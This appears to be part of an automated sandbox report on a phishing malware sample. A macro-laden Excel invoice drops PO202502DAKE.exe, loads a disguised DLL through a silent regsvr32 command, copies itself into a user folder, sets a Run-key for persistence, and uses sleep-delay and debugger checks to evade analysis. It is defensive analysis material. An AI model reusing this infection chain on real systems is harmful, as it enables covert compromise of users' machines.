                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: libcares-2.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: icu.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeSection loaded: msvcp290.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: libcares-2.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: msvcp290.dll
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeSection loaded: icu.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: msi.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: winmm.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: secur32.dll
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                          Source: ~DFE94CD9633EB51867.TMP.0.dr | Initial sample: OLE indicators vbamacros = False

                          Data Obfuscation

                          Source: PO202503D.xlsm | Stream path 'VBA/Module2': High number of string operations
                          Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module Module2, Name: Module2
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FF6220A8700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, 12_2_00007FF6220A8700
                          Source: libcares-2.dll.9.dr | Static PE information: section name: _RDATA
                          Source: PO202502DAKE.exe.9.dr | Static PE information: section name: .xdata
                          Source: libcares-2.dll.12.dr | Static PE information: section name: _RDATA
                          Source: PO202502DAKE.exe.12.dr | Static PE information: section name: .xdata
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CEA1D57 push rbx; ret 12_2_00007FFC9CEA1D5A
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CEA177F push E8001D6Fh; ret 12_2_00007FFC9CEA1789
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CED8BA8 push rdx; retf 12_2_00007FFC9CED8BAB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFC3C5FD2A5 pushad ; iretd 14_2_00007FFC3C5FD2A6
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_00000001400397FB push rsp; ret 16_2_0000000140039802
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003E92B push rsp; ret 16_2_000000014003E932
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003E9FB push rsp; ret 16_2_000000014003EA02
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003EB53 push rsp; ret 16_2_000000014003EB5A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003BB8B push rsp; ret 16_2_000000014003BB92
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_0000000140039BB3 push rsp; ret 16_2_0000000140039BBA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003EC13 push rsp; ret 16_2_000000014003EC1A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003A42B push rsp; ret 16_2_000000014003A432
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_0000000140039C63 push rsp; ret 16_2_0000000140039C6A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003947B push rsp; ret 16_2_0000000140039482
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003ECD3 push rsp; ret 16_2_000000014003ECDA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003E4DB push rsp; ret 16_2_000000014003E4E2
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003A51B push rsp; ret 16_2_000000014003A522
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003BD3B push rsp; ret 16_2_000000014003BD42
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003ED83 push rsp; ret 16_2_000000014003ED8A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003958B push rsp; ret 16_2_0000000140039592
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_0000000140039DCB push rsp; ret 16_2_0000000140039DD2
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003BDF3 push rsp; ret 16_2_000000014003BDFA
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003E703 push rsp; ret 16_2_000000014003E70A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003EF53 push rsp; ret 16_2_000000014003EF5A
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_000000014003E7DB push rsp; ret 16_2_000000014003E7E2
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: 28_2_00007FFC9CDF1D57 push rbx; ret 28_2_00007FFC9CDF1D5A
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: 28_2_00007FFC9CDF177F push E8001D6Fh; ret 28_2_00007FFC9CDF1789
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: 28_2_00007FFC9CE28BA8 push rdx; retf 28_2_00007FFC9CE28BAB
                          Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | File created: C:\Users\user\SystemRootDoc\msvcp290.dll
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | File created: C:\Users\user\SystemRootDoc\libcares-2.dll
                          Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll
                          Source: C:\Program Files\7-Zip\7z.exe | File created: C:\Users\user\AppData\Local\Temp\invoice_temp\libcares-2.dll
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | File created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PO202502DAKE

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CD7F680 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError, 12_2_00007FFC9CD7F680
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory allocated: 23337E60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeMemory allocated: 23337E80000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 1FF1C940000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 1FF1C960000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 21BC0980000 memory reserve | memory write watch
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeMemory allocated: 21BC0AA0000 memory reserve | memory write watch
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4895Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4976Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeWindow / User API: threadDelayed 892Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI coverage: 8.9 %
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeAPI coverage: 5.4 %
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1752Thread sleep count: 4895 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104Thread sleep count: 4976 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 7936Thread sleep count: 892 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe TID: 7936Thread sleep time: -892000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEF7210 SetLastError,FindFirstFileExW,GetLastError,12_2_00007FFC9CEF7210
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE47210 SetLastError,FindFirstFileExW,GetLastError,28_2_00007FFC9CE47210
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: PO202502DAKE.exe, 0000001C.00000002.1452181020.000001FF1C989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh~
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                          Source: PO202502DAKE.exe, 0000000C.00000002.1315626963.0000023337EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm0.P
                          Source: aspnet_wp.exe, 00000010.00000002.6606722236.000001744C4F9000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000010.00000003.2005986751.000001744C4F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``
                          Source: PO202502DAKE.exe, 00000021.00000002.1536495963.0000021BC0839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002C078 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000000014002C078
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A8700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,12_2_00007FF6220A8700
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A1180 Sleep,Sleep,SetUnhandledExceptionFilter,12_2_00007FF6220A1180
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD85F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFC9CD85F0C
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CFC52BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFC9CFC52BC
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeCode function: 16_2_000000014002C078 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000000014002C078
